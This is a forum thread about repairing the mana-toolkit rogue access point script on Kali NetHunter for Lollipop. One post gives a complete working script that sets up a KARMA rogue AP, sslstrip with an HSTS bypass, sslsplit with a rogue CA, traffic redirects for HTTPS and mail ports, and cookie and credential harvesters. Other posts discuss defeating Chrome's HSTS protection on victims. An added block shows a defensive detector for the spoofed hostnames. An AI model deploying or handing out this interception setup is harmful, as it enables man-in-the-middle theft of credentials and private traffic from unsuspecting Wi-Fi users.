
Thread: Mana issues on Nethunter 2.0 / Lollipop

  1. #1
    Join Date
    2014-Nov
    Posts
    41

    Mana issues on Nethunter 2.0 / Lollipop

    Hi guys,

    I'm having issues with mana and Nethunter 2.0 on Lollipop.
    Mana kind of starts and I can connect to the AP but connections are not being forwarded and as far as I can see, the sslstrip process is not running and "iptables -L -n -v" looks pretty generic without all the port forwards for sslstrip/sslsplit.

    This applies to my opo as well as n7 2013 wifi. Booting the OPO into cm11s and NH 1.1 with multirom, it all looks fine.

    Any Ideas? Anyone else having this trouble?

  2. #2
    Join Date
    2014-Nov
    Posts
    41
    Quote Originally Posted by stinkybit View Post
    as far as I can see, the sslstrip process is not running
    At least this part I could solve for myself so far:

    in /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh you first

    Code:
    cd /usr/share/mana-toolkit/sslstrip-hsts/
    and then execute the two python scripts:

    Code:
    python sslstrip.py...
    python dns2proxy.py...
    ..which are not in this location. I changed the script to:
    Code:
    python sslstrip2/sslstrip.py...
    python dns2proxy/dns2proxy.py...

  3. #3
    Join Date
    2015-Aug
    Posts
    7
    Having the exact same problem (nexus 7 2012 wifi, lollipop). I wonder if this is lollipop related and we can restore mana's upstream by downgrading to kitkat and using the dedicated kitkat scripts in the "run-mana" folder.

  4. #4
    Join Date
    2015-Feb
    Posts
    24
    Hi, I think I just fixed this issue. Like stinkybit said, it's all about the wrong path setting in start-nat-full-lollipop.sh.
    Just change the following part of the script

    Code:
    cd /usr/share/mana-toolkit/sslstrip-hsts/
    python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    python dns2proxy.py $phy&
    cd -
    to

    Code:
    cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
    python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
    python dns2proxy.py -i $phy&
    cd -
    and now you should be able to run the script properly.
    However, it seems the HSTS bypass is not working well: the first time, the client can be directed to wwww.google.com by typing www.google.com in the URL, as well as to wwww.gmail.com, but when I clicked login, it came to an error page... and when I tried typing www.google.com again, it failed to go to wwww.google.com.
    So maybe this is not working anymore? Or does the script need to be modified? I don't know how to...
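
Added example (not part of any post in this thread, and not code from mana-toolkit): the hostname change described in post #4, where www.google.com becomes wwww.google.com, shows up in resolver logs, so it can be flagged from the defender's side. The dnsmasq-style log lines, the PROTECTED host list and the function names are assumptions constructed for illustration.

```python
import re

# Assumption: hosts the defender expects to be reached over HTTPS only
# (constructed list, not taken from the thread apart from the two names in post #4).
PROTECTED = {"www.google.com", "www.gmail.com"}

# Constructed sample lines in dnsmasq's "query[TYPE] name from client" form.
SAMPLE_LOG = """\
Oct  8 21:58:01 dnsmasq[412]: query[A] www.google.com from 10.0.0.23
Oct  8 21:58:03 dnsmasq[412]: query[A] wwww.google.com from 10.0.0.23
Oct  8 21:58:09 dnsmasq[412]: query[A] wwww.gmail.com from 10.0.0.23
Oct  8 21:58:15 dnsmasq[412]: query[AAAA] example.org from 10.0.0.40
Oct  8 21:58:20 dnsmasq[412]: query[A] WWWW.Google.com. from 10.0.0.40
"""

QUERY_RE = re.compile(r"query\[\w+\]\s+(\S+)\s+from\s+(\S+)")


def normalize(name):
    """Lower-case a queried name and drop the trailing root dot."""
    return name.rstrip(".").lower()


def demangle(name):
    """Return the protected host that `name` imitates, or None.

    Only the 'www' -> 'wwww' pattern reported in the thread is handled.
    """
    first, _, rest = normalize(name).partition(".")
    if first == "wwww" and rest:
        candidate = "www." + rest
        if candidate in PROTECTED:
            return candidate
    return None


def find_mangled(log_text):
    """Return (client, queried_name, imitated_host) for each suspicious query."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue  # not a query line
        name, client = m.groups()
        real = demangle(name)
        if real:
            hits.append((client, normalize(name), real))
    return hits


if __name__ == "__main__":
    for client, seen, real in find_mangled(SAMPLE_LOG):
        print(f"{client} asked for {seen} (imitates {real})")
```

A hit means a client was handed a link to a look-alike hostname that is not on the browser's HSTS list, which is worth correlating with the access point that client was associated to at the time.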

  5. #5
    Join Date
    2013-Feb
    Posts
    225
    Thanks for the update. This has been verified and fixed in https://github.com/offensive-securit...2c9dfc42e5394d and will be available in the next upcoming release.

  6. #6
    Join Date
    2014-Nov
    Posts
    41
    Thanks to simonpunk2016 - the second cd-command does a better job than calling the scripts with a relative path as I tried it.

    @muts:
    simonpunk also suggested to call dns2proxy.py with "-i" in front of the interface, which also seems correct to me. This might be fixed as well.

  7. #7
    Join Date
    2015-Feb
    Posts
    24
    You are welcome, but it seems the latest Google Chrome version has defeated the HSTS bypass from MITMf. I would like to know if you have succeeded in spoofing a victim that is using the latest Google Chrome version on a different OS. In my case, the victim's Chrome can detect my attack and prevents the victim from browsing any website.

  8. #8
    Join Date
    2014-Nov
    Posts
    41
    I just tried it with the latest chrome version on android and had the following behaviour (same as with fennec, btw):

    http sites are browseable as usual.
    if I browse sites like google.com they fall back to http as long as I don't write "https" explicitly.
    (forced) https-sites give me a warning regarding an untrusted certificate.

    But your problem looks familiar, I think, I had it before - maybe on my windows laptop, but unfortunately can't test it right now.

  9. #9
    Join Date
    2015-Oct
    Posts
    1
    Hi guys, I just repaired this and now it works perfectly.
    Here is the modded script;
    copy and paste it to /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh

    Code:
    #!/bin/bash
    upstream=wlan0
    phy=wlan1
    conf=/etc/mana-toolkit/hostapd-karma.conf
    hostapd=/usr/lib/mana-toolkit/hostapd

    echo '1' > /proc/sys/net/ipv4/ip_forward
    rfkill unblock wlan
    echo -- $phy: flushing interface --
    ip addr flush dev $phy
    echo -- $phy: setting ip --
    ip addr add 10.0.0.1/24 dev $phy
    echo -- $phy: starting the interface --
    ip link set $phy up
    echo -- $phy: setting route --
    ip route add default via 10.0.0.1 dev $phy

    # Starting AP and DHCP
    sed -i "s/^interface=.*$/interface=$phy/" $conf
    $hostapd $conf &
    sleep 5
    dhcpd -cf /etc/mana-toolkit/dhcpd.conf $phy
    sleep 5

    # Add fking rule to table 1006
    for table in $(ip rule list | awk -F"lookup" '{print $2}');
    do
        DEF=`ip route show table $table|grep default|grep $upstream`
        if ! [ -z "$DEF" ]; then
            break
        fi
    done
    ip route add 10.0.0.0/24 dev $phy scope link table $table

    # RM quota from chains to avoid errors in iptables-save
    # http://lists.netfilter.org/pipermail...er/002995.html
    iptables -F bw_INPUT
    iptables -F bw_OUTPUT
    # Save
    iptables-save > /tmp/rules.txt
    # Flush
    iptables --policy INPUT ACCEPT
    iptables --policy FORWARD ACCEPT
    iptables --policy OUTPUT ACCEPT
    iptables -F
    iptables -F -t nat
    # Masquerade
    iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
    iptables -A FORWARD -i $phy -o $upstream -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

    #SSLStrip with HSTS bypass
    cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
    python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
    python dns2proxy.py -i $phy&
    cd -

    #SSLSplit
    sslsplit -D -P -Z -S /var/lib/mana-toolkit/sslsplit -c /usr/share/mana-toolkit/cert/rogue-ca.pem -k /usr/share/mana-toolkit/cert/rogue-ca.key -O -l /var/lib/mana-toolkit/sslsplit-connect.log \
    https 0.0.0.0 10443 \
    http 0.0.0.0 10080 \
    ssl 0.0.0.0 10993 \
    tcp 0.0.0.0 10143 \
    ssl 0.0.0.0 10995 \
    tcp 0.0.0.0 10110 \
    ssl 0.0.0.0 10465 \
    tcp 0.0.0.0 10025&

    # iptables -t nat -A INPUT -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10080
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -j REDIRECT --to-port 10443
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -j REDIRECT --to-port 10143
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 65493 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -j REDIRECT --to-port 10465
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -j REDIRECT --to-port 10025
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -j REDIRECT --to-port 10995
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -j REDIRECT --to-port 10110

    # Start FireLamb
    /usr/share/mana-toolkit/firelamb/firelamb.py -i $phy &

    # Start net-creds
    python /usr/share/mana-toolkit/net-creds/net-creds.py -i $phy > /var/lib/mana-toolkit/net-creds.log.

    sleep 5

    echo "Hit enter to kill me"
    read
    pkill dhcpd
    pkill sslstrip
    pkill sslsplit
    pkill hostapd
    pkill python
    # Restore
    iptables-restore < /tmp/rules.txt
    rm /tmp/rules.txt
    # Remove iface and routes
    ip addr flush dev $phy
    ip link set $phy down

  10. #10
    Join Date
    2015-Oct
    Posts
    16
    Quote Originally Posted by patryq9603 View Post
    HI guys I just repair this and now it works perfect
    here is moded script
    copy and paste it to /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh

    Can I paste this in the nat-full section of mana on nethunter nexus 7 and click update?
    New to all this :-/

    EDIT: nevermind, got it sorted now :-)
    Last edited by nexusnexus; 2015-10-08 at 22:15.
